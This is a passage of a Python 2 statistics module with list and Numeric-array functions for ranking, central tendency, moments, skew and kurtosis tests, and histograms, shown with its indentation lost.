Ranks the data in inlist, dealing with ties appropriately. Assumes
a 1D inlist. Adapted from Gary Perlman's |Stat ranksort.
Usage: lrankdata(inlist)
Returns: a list of length equal to inlist, containing rank scores
"""
n = len(inlist)
svec, ivec = shellsort(inlist)
sumranks = 0
dupcount = 0
newlist = [0]*n
for i in range(n):
sumranks = sumranks + i
dupcount = dupcount + 1
if i==n-1 or svec[i] <> svec[i+1]:
averank = sumranks / float(dupcount) + 1
for j in range(i-dupcount+1,i+1):
newlist[ivec[j]] = averank
sumranks = 0
dupcount = 0
return newlist
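# e.g., lrankdata([10, 20, 20, 30]) -> [1.0, 2.5, 2.5, 4.0]: the tied 20s
# share the average of ranks 2 and 3.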
def outputpairedstats(fname,writemode,name1,n1,m1,se1,min1,max1,name2,n2,m2,se2,min2,max2,statname,stat,prob):
"""
Prints, or writes to a file, stats for two groups, using the name, n,
mean, sterr, min and max for each group, as well as the statistic name,
its value, and the associated p-value.
Usage: outputpairedstats(fname,writemode,
name1,n1,mean1,stderr1,min1,max1,
name2,n2,mean2,stderr2,min2,max2,
statname,stat,prob)
Returns: None
"""
suffix = '' # for *s after the p-value
try:
x = prob.shape
prob = prob[0]
except:
pass
if prob < 0.001: suffix = ' ***'
elif prob < 0.01: suffix = ' **'
elif prob < 0.05: suffix = ' *'
title = [['Name','N','Mean','SD','Min','Max']]
lofl = title+[[name1,n1,round(m1,3),round(math.sqrt(se1),3),min1,max1],
[name2,n2,round(m2,3),round(math.sqrt(se2),3),min2,max2]]
if type(fname)<>StringType or len(fname)==0:
print
print statname
print
pstat.printcc(lofl)
print
try:
if stat.shape == ():
stat = stat[0]
if prob.shape == ():
prob = prob[0]
except:
pass
print 'Test statistic = ',round(stat,3),' p = ',round(prob,3),suffix
print
else:
file = open(fname,writemode)
file.write('\n'+statname+'\n\n')
file.close()
writecc(lofl,fname,'a')
file = open(fname,'a')
try:
if stat.shape == ():
stat = stat[0]
if prob.shape == ():
prob = prob[0]
except:
pass
file.write(pstat.list2string(['\nTest statistic = ',round(stat,4),' p = ',round(prob,4),suffix,'\n\n']))
file.close()
return None
def lfindwithin (data):
"""
Returns an integer representing a binary vector, where 1=within-
subject factor, 0=between. Input equals the entire data 2D list (i.e.,
column 0=random factor, column -1=measured values (those two are skipped).
Note: input data is in |Stat format ... a list of lists ("2D list") with
one row per measured value, first column=subject identifier, last column=
score, one in-between column per factor (these columns contain level
designations on each factor). See also stats.anova.__doc__.
Usage: lfindwithin(data) data in |Stat format
"""
numfact = len(data[0])-1
withinvec = 0
for col in range(1,numfact):
examplelevel = pstat.unique(pstat.colex(data,col))[0]
rows = pstat.linexand(data,col,examplelevel) # get 1 level of this factor
factsubjs = pstat.unique(pstat.colex(rows,0))
allsubjs = pstat.unique(pstat.colex(data,0))
if len(factsubjs) == len(allsubjs): # every subject appears at this level => within-subjects factor
withinvec = withinvec + (1 << col)
return withinvec
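# Illustrative reading of the return value (not from the original source):
# if the factors in columns 1 and 2 are both within-subject, lfindwithin
# returns (1 << 1) + (1 << 2) == 6, i.e. bit c is set exactly when column c
# holds a within-subject factor.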
#########################################################
#########################################################
####### DISPATCH LISTS AND TUPLES TO ABOVE FCNS #########
#########################################################
#########################################################
## CENTRAL TENDENCY:
geometricmean = Dispatch ( (lgeometricmean, (ListType, TupleType)), )
harmonicmean = Dispatch ( (lharmonicmean, (ListType, TupleType)), )
mean = Dispatch ( (lmean, (ListType, TupleType)), )
median = Dispatch ( (lmedian, (ListType, TupleType)), )
medianscore = Dispatch ( (lmedianscore, (ListType, TupleType)), )
mode = Dispatch ( (lmode, (ListType, TupleType)), )
## MOMENTS:
moment = Dispatch ( (lmoment, (ListType, TupleType)), )
variation = Dispatch ( (lvariation, (ListType, TupleType)), )
skew = Dispatch ( (lskew, (ListType, TupleType)), )
kurtosis = Dispatch ( (lkurtosis, (ListType, TupleType)), )
describe = Dispatch ( (ldescribe, (ListType, TupleType)), )
## FREQUENCY STATISTICS:
itemfreq = Dispatch ( (litemfreq, (ListType, TupleType)), )
scoreatpercentile = Dispatch ( (lscoreatpercentile, (ListType, TupleType)), )
percentileofscore = Dispatch ( (lpercentileofscore, (ListType, TupleType)), )
histogram = Dispatch ( (lhistogram, (ListType, TupleType)), )
cumfreq = Dispatch ( (lcumfreq, (ListType, TupleType)), )
relfreq = Dispatch ( (lrelfreq, (ListType, TupleType)), )
## VARIABILITY:
obrientransform = Dispatch ( (lobrientransform, (ListType, TupleType)), )
samplevar = Dispatch ( (lsamplevar, (ListType, TupleType)), )
samplestdev = Dispatch ( (lsamplestdev, (ListType, TupleType)), )
var = Dispatch ( (lvar, (ListType, TupleType)), )
stdev = Dispatch ( (lstdev, (ListType, TupleType)), )
sterr = Dispatch ( (lsterr, (ListType, TupleType)), )
sem = Dispatch ( (lsem, (ListType, TupleType)), )
z = Dispatch ( (lz, (ListType, TupleType)), )
zs = Dispatch ( (lzs, (ListType, TupleType)), )
## TRIMMING FCNS:
trimboth = Dispatch ( (ltrimboth, (ListType, TupleType)), )
trim1 = Dispatch ( (ltrim1, (ListType, TupleType)), )
## CORRELATION FCNS:
paired = Dispatch ( (lpaired, (ListType, TupleType)), )
pearsonr = Dispatch ( (lpearsonr, (ListType, TupleType)), )
origin_pearsonr = Dispatch((lorigin_pearsonr,(ListType, TupleType)), )
spearmanr = Dispatch ( (lspearmanr, (ListType, TupleType)), )
pointbiserialr = Dispatch ( (lpointbiserialr, (ListType, TupleType)), )
kendalltau = Dispatch ( (lkendalltau, (ListType, TupleType)), )
linregress = Dispatch ( (llinregress, (ListType, TupleType)), )
## INFERENTIAL STATS:
ttest_1samp = Dispatch ( (lttest_1samp, (ListType, TupleType)), )
ttest_ind = Dispatch ( (lttest_ind, (ListType, TupleType)), )
ttest_rel = Dispatch ( (lttest_rel, (ListType, TupleType)), )
chisquare = Dispatch ( (lchisquare, (ListType, TupleType)), )
ks_2samp = Dispatch ( (lks_2samp, (ListType, TupleType)), )
mannwhitneyu = Dispatch ( (lmannwhitneyu, (ListType, TupleType)), )
ranksums = Dispatch ( (lranksums, (ListType, TupleType)), )
tiecorrect = Dispatch ( (ltiecorrect, (ListType, TupleType)), )
wilcoxont = Dispatch ( (lwilcoxont, (ListType, TupleType)), )
kruskalwallish = Dispatch ( (lkruskalwallish, (ListType, TupleType)), )
friedmanchisquare = Dispatch ( (lfriedmanchisquare, (ListType, TupleType)), )
## PROBABILITY CALCS:
chisqprob = Dispatch ( (lchisqprob, (IntType, FloatType)), )
zprob = Dispatch ( (lzprob, (IntType, FloatType)), )
ksprob = Dispatch ( (lksprob, (IntType, FloatType)), )
fprob = Dispatch ( (lfprob, (IntType, FloatType)), )
betacf = Dispatch ( (lbetacf, (IntType, FloatType)), )
betai = Dispatch ( (lbetai, (IntType, FloatType)), )
erfcc = Dispatch ( (lerfcc, (IntType, FloatType)), )
gammln = Dispatch ( (lgammln, (IntType, FloatType)), )
## ANOVA FUNCTIONS:
F_oneway = Dispatch ( (lF_oneway, (ListType, TupleType)), )
F_value = Dispatch ( (lF_value, (ListType, TupleType)), )
## SUPPORT FUNCTIONS:
incr = Dispatch ( (lincr, (ListType, TupleType)), )
sum = Dispatch ( (lsum, (ListType, TupleType)), )
cumsum = Dispatch ( (lcumsum, (ListType, TupleType)), )
ss = Dispatch ( (lss, (ListType, TupleType)), )
summult = Dispatch ( (lsummult, (ListType, TupleType)), )
square_of_sums = Dispatch ( (lsquare_of_sums, (ListType, TupleType)), )
sumdiffsquared = Dispatch ( (lsumdiffsquared, (ListType, TupleType)), )
shellsort = Dispatch ( (lshellsort, (ListType, TupleType)), )
rankdata = Dispatch ( (lrankdata, (ListType, TupleType)), )
findwithin = Dispatch ( (lfindwithin, (ListType, TupleType)), )
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
#============= THE ARRAY-VERSION OF THE STATS FUNCTIONS ===============
try: # DEFINE THESE *ONLY* IF NUMERIC IS AVAILABLE
import Numeric
N = Numeric
import LinearAlgebra
LA = LinearAlgebra
#####################################
######## ACENTRAL TENDENCY ########
#####################################
def ageometricmean (inarray,dimension=None,keepdims=0):
"""
Calculates the geometric mean of the values in the passed array.
That is: n-th root of (x1 * x2 * ... * xn). Defaults to ALL values in
the passed array. Use dimension=None to flatten array first. REMEMBER: if
dimension=0, it collapses over dimension 0 ('rows' in a 2D array) only, and
if dimension is a sequence, it collapses over all specified dimensions. If
keepdims is set to 1, the resulting array will have as many dimensions as
inarray, with only 1 'level' per dim that was collapsed over.
Usage: ageometricmean(inarray,dimension=None,keepdims=0)
Returns: geometric mean computed over dim(s) listed in dimension
"""
inarray = N.array(inarray,N.Float)
if dimension == None:
inarray = N.ravel(inarray)
size = len(inarray)
mult = N.power(inarray,1.0/size)
mult = N.multiply.reduce(mult)
elif type(dimension) in [IntType,FloatType]:
size = inarray.shape[dimension]
mult = N.power(inarray,1.0/size)
mult = N.multiply.reduce(mult,dimension)
if keepdims == 1:
shp = list(inarray.shape)
shp[dimension] = 1
mult = N.reshape(mult,shp) # reshape the running product ('sum' was undefined here)
else: # must be a SEQUENCE of dims to average over
dims = list(dimension)
dims.sort()
dims.reverse()
size = N.array(N.multiply.reduce(N.take(inarray.shape,dims)),N.Float)
mult = N.power(inarray,1.0/size)
for dim in dims:
mult = N.multiply.reduce(mult,dim)
if keepdims == 1:
shp = list(inarray.shape)
for dim in dims:
shp[dim] = 1
mult = N.reshape(mult,shp)
return mult
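# Quick numeric sanity check (assumes Numeric is importable as N, as above):
#   >>> ageometricmean(N.array([1.0, 4.0, 16.0]))
#   4.0                       # (1*4*16)**(1/3.), up to float rounding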
def aharmonicmean (inarray,dimension=None,keepdims=0):
"""
Calculates the harmonic mean of the values in the passed array.
That is: n / (1/x1 + 1/x2 + ... + 1/xn). Defaults to ALL values in
the passed array. Use dimension=None to flatten array first. REMEMBER: if
dimension=0, it collapses over dimension 0 ('rows' in a 2D array) only, and
if dimension is a sequence, it collapses over all specified dimensions. If
keepdims is set to 1, the resulting array will have as many dimensions as
inarray, with only 1 'level' per dim that was collapsed over.
Usage: aharmonicmean(inarray,dimension=None,keepdims=0)
Returns: harmonic mean computed over dim(s) in dimension
"""
inarray = inarray.astype(N.Float)
if dimension == None:
inarray = N.ravel(inarray)
size = len(inarray)
s = N.add.reduce(1.0 / inarray)
elif type(dimension) in [IntType,FloatType]:
size = float(inarray.shape[dimension])
s = N.add.reduce(1.0/inarray, dimension)
if keepdims == 1:
shp = list(inarray.shape)
shp[dimension] = 1
s = N.reshape(s,shp)
else: # must be a SEQUENCE of dims to average over
dims = list(dimension)
dims.sort()
nondims = []
for i in range(len(inarray.shape)):
if i not in dims:
nondims.append(i)
tinarray = N.transpose(inarray,nondims+dims) # put keep-dims first
idx = [0] *len(nondims)
if idx == []:
size = len(N.ravel(inarray))
s = asum(1.0 / inarray)
if keepdims == 1:
s = N.reshape([s],N.ones(len(inarray.shape)))
else:
idx[0] = -1
loopcap = N.array(tinarray.shape[0:len(nondims)]) -1
s = N.zeros(loopcap+1,N.Float)
while incr(idx,loopcap) <> -1:
s[idx] = asum(1.0/tinarray[idx])
size = N.multiply.reduce(N.take(inarray.shape,dims))
if keepdims == 1:
shp = list(inarray.shape)
for dim in dims:
shp[dim] = 1
s = N.reshape(s,shp)
return size / s
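# Hedged example: 3 / (1/1. + 1/2. + 1/4.) == 12/7.:
#   >>> aharmonicmean(N.array([1.0, 2.0, 4.0]))
#   1.714285714...            # up to float rounding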
def amean (inarray,dimension=None,keepdims=0):
"""
Calculates the arithmetic mean of the values in the passed array.
That is: 1/n * (x1 + x2 + ... + xn). Defaults to ALL values in the
passed array. Use dimension=None to flatten array first. REMEMBER: if
dimension=0, it collapses over dimension 0 ('rows' in a 2D array) only, and
if dimension is a sequence, it collapses over all specified dimensions. If
keepdims is set to 1, the resulting array will have as many dimensions as
inarray, with only 1 'level' per dim that was collapsed over.
Usage: amean(inarray,dimension=None,keepdims=0)
Returns: arithmetic mean calculated over dim(s) in dimension
"""
if inarray.typecode() in ['l','s','b']:
inarray = inarray.astype(N.Float)
if dimension == None:
inarray = N.ravel(inarray)
sum = N.add.reduce(inarray)
denom = float(len(inarray))
elif type(dimension) in [IntType,FloatType]:
sum = asum(inarray,dimension)
denom = float(inarray.shape[dimension])
if keepdims == 1:
shp = list(inarray.shape)
shp[dimension] = 1
sum = N.reshape(sum,shp)
else: # must be a TUPLE of dims to average over
dims = list(dimension)
dims.sort()
dims.reverse()
sum = inarray *1.0
for dim in dims:
sum = N.add.reduce(sum,dim)
denom = N.array(N.multiply.reduce(N.take(inarray.shape,dims)),N.Float)
if keepdims == 1:
shp = list(inarray.shape)
for dim in dims:
shp[dim] = 1
sum = N.reshape(sum,shp)
return sum/denom
def amedian (inarray,numbins=1000):
"""
Calculates the COMPUTED median value of an array of numbers, given the
number of bins to use for the histogram (more bins approaches finding the
precise median value of the array; default number of bins = 1000). From
G.W. Heiman's Basic Stats, or CRC Probability & Statistics.
NOTE: THIS ROUTINE ALWAYS uses the entire passed array (flattens it first).
Usage: amedian(inarray,numbins=1000)
Returns: median calculated over ALL values in inarray
"""
inarray = N.ravel(inarray)
(hist, smallest, binsize, extras) = ahistogram(inarray,numbins)
cumhist = N.cumsum(hist) # make cumulative histogram
otherbins = N.greater_equal(cumhist,len(inarray)/2.0)
otherbins = list(otherbins) # list of 0/1s, 1s start at median bin
cfbin = otherbins.index(1) # get 1st(!) index holding 50%ile score
LRL = smallest + binsize*cfbin # get lower real limit of that bin
cfbelow = N.add.reduce(hist[0:cfbin]) # cum. freq. below bin
freq = hist[cfbin] # frequency IN the 50%ile bin
median = LRL + ((len(inarray)/2.0-cfbelow)/float(freq))*binsize # MEDIAN
return median
def amedianscore (inarray,dimension=None):
"""
Returns the 'middle' score of the passed array. If there is an even
number of scores, the mean of the 2 middle scores is returned. Can function
with 1D arrays, or on the FIRST dimension of 2D arrays (i.e., dimension can
be None, to pre-flatten the array, or else dimension must equal 0).
Usage: amedianscore(inarray,dimension=None)
Returns: 'middle' score of the array, or the mean of the 2 middle scores
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
inarray = N.sort(inarray,dimension)
if inarray.shape[dimension] % 2 == 0: # if even number of elements
indx = inarray.shape[dimension]/2 # integer division correct
median = N.asarray(inarray[indx]+inarray[indx-1]) / 2.0
else:
indx = inarray.shape[dimension] / 2 # integer division correct
median = N.take(inarray,[indx],dimension)
if median.shape == (1,):
median = median[0]
return median
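# Illustrative check (even-length input averages the two middle scores):
#   >>> amedianscore(N.array([1, 2, 3, 4]))
#   2.5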
def amode(a, dimension=None):
"""
Returns an array of the modal (most common) score in the passed array.
If there is more than one such score, ONLY THE FIRST is returned.
The bin-count for the modal values is also returned. Operates on whole
array (dimension=None), or on a given dimension.
Usage: amode(a, dimension=None)
Returns: array of bin-counts for mode(s), array of corresponding modal values
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
scores = pstat.aunique(N.ravel(a)) # get ALL unique values
testshape = list(a.shape)
testshape[dimension] = 1
oldmostfreq = N.zeros(testshape)
oldcounts = N.zeros(testshape)
for score in scores:
template = N.equal(a,score)
counts = asum(template,dimension,1)
mostfrequent = N.where(N.greater(counts,oldcounts),score,oldmostfreq)
oldcounts = N.where(N.greater(counts,oldcounts),counts,oldcounts)
oldmostfreq = mostfrequent
return oldcounts, mostfrequent
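# Hedged example (modal value 2 occurs 3 times; counts come back first):
#   >>> amode(N.array([1, 1, 2, 2, 2, 7]))
#   (array([3]), array([2]))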
def atmean(a,limits=None,inclusive=(1,1)):
"""
Returns the arithmetic mean of all values in an array, ignoring values
strictly outside the sequence passed to 'limits'. Note: either limit
in the sequence, or the value of limits itself, can be set to None. The
inclusive list/tuple determines whether the lower and upper limiting bounds
(respectively) are open/exclusive (0) or closed/inclusive (1).
Usage: atmean(a,limits=None,inclusive=(1,1))
"""
if a.typecode() in ['l','s','b']:
a = a.astype(N.Float)
if limits == None:
return mean(a)
assert type(limits) in [ListType,TupleType,N.ArrayType], "Wrong type for limits in atmean"
if inclusive[0]: lowerfcn = N.greater_equal
else: lowerfcn = N.greater
if inclusive[1]: upperfcn = N.less_equal
else: upperfcn = N.less
if limits[0] > N.maximum.reduce(N.ravel(a)) or limits[1] < N.minimum.reduce(N.ravel(a)):
raise ValueError, "No array values within given limits (atmean)."
elif limits[0]==None and limits[1]<>None:
mask = upperfcn(a,limits[1])
elif limits[0]<>None and limits[1]==None:
mask = lowerfcn(a,limits[0])
elif limits[0]<>None and limits[1]<>None:
mask = lowerfcn(a,limits[0])*upperfcn(a,limits[1])
s = float(N.add.reduce(N.ravel(a*mask)))
n = float(N.add.reduce(N.ravel(mask)))
return s/n
def atvar(a,limits=None,inclusive=(1,1)):
"""
Returns the sample variance of values in an array, (i.e., using N-1),
ignoring values strictly outside the sequence passed to 'limits'.
Note: either limit in the sequence, or the value of limits itself,
can be set to None. The inclusive list/tuple determines whether the lower
and upper limiting bounds (respectively) are open/exclusive (0) or
closed/inclusive (1).
Usage: atvar(a,limits=None,inclusive=(1,1))
"""
a = a.astype(N.Float)
if limits == None or limits == [None,None]:
term1 = N.add.reduce(N.ravel(a*a))
n = float(len(N.ravel(a))) - 1
term2 = N.add.reduce(N.ravel(a))**2 / n
print term1, term2, n
return (term1 - term2) / n
assert type(limits) in [ListType,TupleType,N.ArrayType], "Wrong type for limits in atvar"
if inclusive[0]: lowerfcn = N.greater_equal
else: lowerfcn = N.greater
if inclusive[1]: upperfcn = N.less_equal
else: upperfcn = N.less
if limits[0] > N.maximum.reduce(N.ravel(a)) or limits[1] < N.minimum.reduce(N.ravel(a)):
raise ValueError, "No array values within given limits (atvar)."
elif limits[0]==None and limits[1]<>None:
mask = upperfcn(a,limits[1])
elif limits[0]<>None and limits[1]==None:
mask = lowerfcn(a,limits[0])
elif limits[0]<>None and limits[1]<>None:
mask = lowerfcn(a,limits[0])*upperfcn(a,limits[1])
term1 = N.add.reduce(N.ravel(a*a*mask))
n = float(N.add.reduce(N.ravel(mask))) - 1
term2 = N.add.reduce(N.ravel(a*mask))**2 / n
print term1, term2, n
return (term1 - term2) / n
def atmin(a,lowerlimit=None,dimension=None,inclusive=1):
"""
Returns the minimum value of a, along dimension, including only values less
than (or equal to, if inclusive=1) lowerlimit. If the limit is set to None,
all values in the array are used.
Usage: atmin(a,lowerlimit=None,dimension=None,inclusive=1)
"""
if inclusive: lowerfcn = N.greater
else: lowerfcn = N.greater_equal
if dimension == None:
a = N.ravel(a)
dimension = 0
if lowerlimit == None:
lowerlimit = N.minimum.reduce(N.ravel(a))-11
biggest = N.maximum.reduce(N.ravel(a))
ta = N.where(lowerfcn(a,lowerlimit),a,biggest)
return N.minimum.reduce(ta,dimension)
def atmax(a,upperlimit,dimension=None,inclusive=1):
"""
Returns the maximum value of a, along dimension, including only values greater
than (or equal to, if inclusive=1) upperlimit. If the limit is set to None,
a limit larger than the max value in the array is used.
Usage: atmax(a,upperlimit,dimension=None,inclusive=1)
"""
if inclusive: upperfcn = N.less
else: upperfcn = N.less_equal
if dimension == None:
a = N.ravel(a)
dimension = 0
if upperlimit == None:
upperlimit = N.maximum.reduce(N.ravel(a))+1
smallest = N.minimum.reduce(N.ravel(a))
ta = N.where(upperfcn(a,upperlimit),a,smallest)
return N.maximum.reduce(ta,dimension)
def atstdev(a,limits=None,inclusive=(1,1)):
"""
Returns the standard deviation of all values in an array, ignoring values
strictly outside the sequence passed to 'limits'. Note: either limit
in the sequence, or the value of limits itself, can be set to None. The
inclusive list/tuple determines whether the lower and upper limiting bounds
(respectively) are open/exclusive (0) or closed/inclusive (1).
Usage: atstdev(a,limits=None,inclusive=(1,1))
"""
return N.sqrt(tvar(a,limits,inclusive))
def atsem(a,limits=None,inclusive=(1,1)):
"""
Returns the standard error of the mean for the values in an array,
(i.e., using N for the denominator), ignoring values strictly outside
the sequence passed to 'limits'. Note: either limit in the sequence,
or the value of limits itself, can be set to None. The inclusive list/tuple
determines whether the lower and upper limiting bounds (respectively) are
open/exclusive (0) or closed/inclusive (1).
Usage: atsem(a,limits=None,inclusive=(1,1))
"""
sd = tstdev(a,limits,inclusive)
if limits == None or limits == [None,None]:
n = float(len(N.ravel(a)))
return sd/math.sqrt(n) # no limits given: plain sd over sqrt(n)
assert type(limits) in [ListType,TupleType,N.ArrayType], "Wrong type for limits in atsem"
if inclusive[0]: lowerfcn = N.greater_equal
else: lowerfcn = N.greater
if inclusive[1]: upperfcn = N.less_equal
else: upperfcn = N.less
if limits[0] > N.maximum.reduce(N.ravel(a)) or limits[1] < N.minimum.reduce(N.ravel(a)):
raise ValueError, "No array values within given limits (atsem)."
elif limits[0]==None and limits[1]<>None:
mask = upperfcn(a,limits[1])
elif limits[0]<>None and limits[1]==None:
mask = lowerfcn(a,limits[0])
elif limits[0]<>None and limits[1]<>None:
mask = lowerfcn(a,limits[0])*upperfcn(a,limits[1])
term1 = N.add.reduce(N.ravel(a*a*mask))
n = float(N.add.reduce(N.ravel(mask)))
return sd/math.sqrt(n)
#####################################
############ AMOMENTS #############
#####################################
def amoment(a,moment=1,dimension=None):
"""
Calculates the nth moment about the mean for a sample (defaults to the
1st moment). Generally used to calculate coefficients of skewness and
kurtosis. Dimension can equal None (ravel array first), an integer
(the dimension over which to operate), or a sequence (operate over
multiple dimensions).
Usage: amoment(a,moment=1,dimension=None)
Returns: appropriate moment along given dimension
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
if moment == 1:
return 0.0
else:
mn = amean(a,dimension,1) # 1=keepdims
s = N.power((a-mn),moment)
return amean(s,dimension)
def avariation(a,dimension=None):
"""
Returns the coefficient of variation, as defined in CRC Standard
Probability and Statistics, p.6. Dimension can equal None (ravel array
first), an integer (the dimension over which to operate), or a
sequence (operate over multiple dimensions).
Usage: avariation(a,dimension=None)
"""
return 100.0*asamplestdev(a,dimension)/amean(a,dimension)
def askew(a,dimension=None):
"""
Returns the skewness of a distribution (normal ==> 0.0; >0 means extra
weight in the right tail). Use askewtest() to see if it's close enough.
Dimension can equal None (ravel array first), an integer (the
dimension over which to operate), or a sequence (operate over multiple
dimensions).
Usage: askew(a, dimension=None)
Returns: skew of vals in a along dimension, returning ZERO where all vals equal
"""
denom = N.power(amoment(a,2,dimension),1.5)
zero = N.equal(denom,0)
if type(denom) == N.ArrayType and asum(zero) <> 0:
print "Number of zeros in askew: ",asum(zero)
denom = denom + zero # prevent divide-by-zero
return N.where(zero, 0, amoment(a,3,dimension)/denom)
def akurtosis(a,dimension=None):
"""
Returns the kurtosis of a distribution (normal ==> 3.0; >3 means
heavier in the tails, and usually more peaked). Use akurtosistest()
to see if it's close enough. Dimension can equal None (ravel array
first), an integer (the dimension over which to operate), or a
sequence (operate over multiple dimensions).
Usage: akurtosis(a,dimension=None)
Returns: kurtosis of values in a along dimension, and ZERO where all vals equal
"""
denom = N.power(amoment(a,2,dimension),2)
zero = N.equal(denom,0)
if type(denom) == N.ArrayType and asum(zero) <> 0:
print "Number of zeros in akurtosis: ",asum(zero)
denom = denom + zero # prevent divide-by-zero
return N.where(zero,0,amoment(a,4,dimension)/denom)
def adescribe(inarray,dimension=None):
"""
Returns several descriptive statistics of the passed array. Dimension
can equal None (ravel array first), an integer (the dimension over
which to operate), or a sequence (operate over multiple dimensions).
Usage: adescribe(inarray,dimension=None)
Returns: n, (min,max), mean, standard deviation, skew, kurtosis
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
n = inarray.shape[dimension]
mm = (N.minimum.reduce(inarray),N.maximum.reduce(inarray))
m = amean(inarray,dimension)
sd = astdev(inarray,dimension)
skew = askew(inarray,dimension)
kurt = akurtosis(inarray,dimension)
return n, mm, m, sd, skew, kurt
#####################################
######## NORMALITY TESTS ##########
#####################################
def askewtest(a,dimension=None):
"""
Tests whether the skew is significantly different from a normal
distribution. Dimension can equal None (ravel array first), an
integer (the dimension over which to operate), or a sequence (operate
over multiple dimensions).
Usage: askewtest(a,dimension=None)
Returns: z-score and 2-tail z-probability
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
b2 = askew(a,dimension)
n = float(a.shape[dimension])
y = b2 * N.sqrt(((n+1)*(n+3)) / (6.0*(n-2)) )
beta2 = ( 3.0*(n*n+27*n-70)*(n+1)*(n+3) ) / ( (n-2.0)*(n+5)*(n+7)*(n+9) )
W2 = -1 + N.sqrt(2*(beta2-1))
delta = 1/N.sqrt(N.log(N.sqrt(W2)))
alpha = N.sqrt(2/(W2-1))
y = N.where(N.equal(y,0),1,y)
Z = delta*N.log(y/alpha + N.sqrt((y/alpha)**2+1))
return Z, (1.0-zprob(Z))*2
def akurtosistest(a,dimension=None):
"""
Tests whether a dataset has normal kurtosis (i.e.,
kurtosis = 3(n-1)/(n+1)). Valid only for n >= 20. Dimension can equal None
(ravel array first), an integer (the dimension over which to operate),
or a sequence (operate over multiple dimensions).
Usage: akurtosistest(a,dimension=None)
Returns: z-score and 2-tail z-probability, returns 0 for bad pixels
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
n = float(a.shape[dimension])
if n<20:
print "akurtosistest only valid for n>=20 ... continuing anyway, n=",n
b2 = akurtosis(a,dimension)
E = 3.0*(n-1) /(n+1)
varb2 = 24.0*n*(n-2)*(n-3) / ((n+1)*(n+1)*(n+3)*(n+5))
x = (b2-E)/N.sqrt(varb2)
sqrtbeta1 = 6.0*(n*n-5*n+2)/((n+7)*(n+9)) * N.sqrt((6.0*(n+3)*(n+5))/
(n*(n-2)*(n-3)))
A = 6.0 + 8.0/sqrtbeta1 *(2.0/sqrtbeta1 + N.sqrt(1+4.0/(sqrtbeta1**2)))
term1 = 1 -2/(9.0*A)
denom = 1 +x*N.sqrt(2/(A-4.0))
denom = N.where(N.less(denom,0), 99, denom)
term2 = N.where(N.equal(denom,0), term1, N.power((1-2.0/A)/denom,1/3.0))
Z = ( term1 - term2 ) / N.sqrt(2/(9.0*A))
Z = N.where(N.equal(denom,99), 0, Z)
return Z, (1.0-zprob(Z))*2
def anormaltest(a,dimension=None):
"""
Tests whether skew and/OR kurtosis of dataset differs from normal
curve. Can operate over multiple dimensions. Dimension can equal
None (ravel array first), an integer (the dimension over which to
operate), or a sequence (operate over multiple dimensions).
Usage: anormaltest(a,dimension=None)
Returns: z-score and 2-tail probability
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
s,p = askewtest(a,dimension)
k,p = akurtosistest(a,dimension)
k2 = N.power(s,2) + N.power(k,2)
return k2, achisqprob(k2,2)
#####################################
###### AFREQUENCY FUNCTIONS #######
#####################################
def aitemfreq(a):
"""
Returns a 2D array of item frequencies. Column 1 contains item values,
column 2 contains their respective counts. Assumes a 1D array is passed.
Usage: aitemfreq(a)
Returns: a 2D frequency table (col [0:n-1]=scores, col n=frequencies)
"""
scores = pstat.aunique(a)
scores = N.sort(scores)
freq = N.zeros(len(scores))
for i in range(len(scores)):
freq[i] = N.add.reduce(N.equal(a,scores[i]))
return N.array(pstat.aabut(scores, freq))
def ascoreatpercentile (inarray, percent):
"""
Usage: ascoreatpercentile(inarray,percent) 0<percent<100
Returns: score at given percentile, relative to inarray distribution
"""
percent = percent / 100.0
targetcf = percent*len(inarray)
h, lrl, binsize, extras = histogram(inarray)
cumhist = cumsum(h*1)
for i in range(len(cumhist)):
if cumhist[i] >= targetcf:
break
score = binsize * ((targetcf - cumhist[i-1]) / float(h[i])) + (lrl+binsize*i)
return score
def apercentileofscore (inarray,score,histbins=10,defaultlimits=None):
"""
Note: result of this function depends on the values used to histogram
the data(!).
Usage: apercentileofscore(inarray,score,histbins=10,defaultlimits=None)
Returns: percentile-position of score (0-100) relative to inarray
"""
h, lrl, binsize, extras = histogram(inarray,histbins,defaultlimits)
cumhist = cumsum(h*1)
i = int((score - lrl)/float(binsize))
pct = (cumhist[i-1]+((score-(lrl+binsize*i))/float(binsize))*h[i])/float(len(inarray)) * 100
return pct
def ahistogram (inarray,numbins=10,defaultlimits=None,printextras=1):
"""
Returns (i) an array of histogram bin counts, (ii) the smallest value
of the histogram binning, and (iii) the bin width (the last 2 are not
necessarily integers). Default number of bins is 10. Defaultlimits
can be None (the routine picks bins spanning all the numbers in the
inarray) or a 2-sequence (lowerlimit, upperlimit). Returns all of the
following: array of bin values, lowerreallimit, binsize, extrapoints.
Usage: ahistogram(inarray,numbins=10,defaultlimits=None,printextras=1)
Returns: (array of bin counts, bin lower real limit, bin width, #-points-outside-range)
"""
inarray = N.ravel(inarray) # flatten any >1D arrays
if (defaultlimits <> None):
lowerreallimit = defaultlimits[0]
upperreallimit = defaultlimits[1]
binsize = (upperreallimit-lowerreallimit) / float(numbins)
else:
Min = N.minimum.reduce(inarray)
Max = N.maximum.reduce(inarray)
estbinwidth = float(Max - Min)/float(numbins) + 1
binsize = (Max-Min+estbinwidth)/float(numbins)
lowerreallimit = Min - binsize/2.0 #lower real limit,1st bin
bins = N.zeros(numbins)
extrapoints = 0
for num in inarray:
try:
if (num-lowerreallimit) < 0:
extrapoints = extrapoints + 1
else:
bintoincrement = int((num-lowerreallimit) / float(binsize))
bins[bintoincrement] = bins[bintoincrement] + 1
except: # point outside lower/upper limits
extrapoints = extrapoints + 1
if (extrapoints > 0 and printextras == 1):
print '\nPoints outside given histogram range =',extrapoints
return (bins, lowerreallimit, binsize, extrapoints)
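# Worked example, not from the original source: Min=1, Max=3, numbins=2
# gives binsize=(2+2)/2=2.0 and lowerreallimit=1-1.0=0.0, so:
#   >>> ahistogram(N.array([1., 2., 2., 3.]), numbins=2)
#   (array([1, 3]), 0.0, 2.0, 0)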
def acumfreq(a,numbins=10,defaultreallimits=None):
"""
Returns a cumulative frequency histogram, using the histogram function.
Defaultreallimits can be None (use all data), or a 2-sequence containing
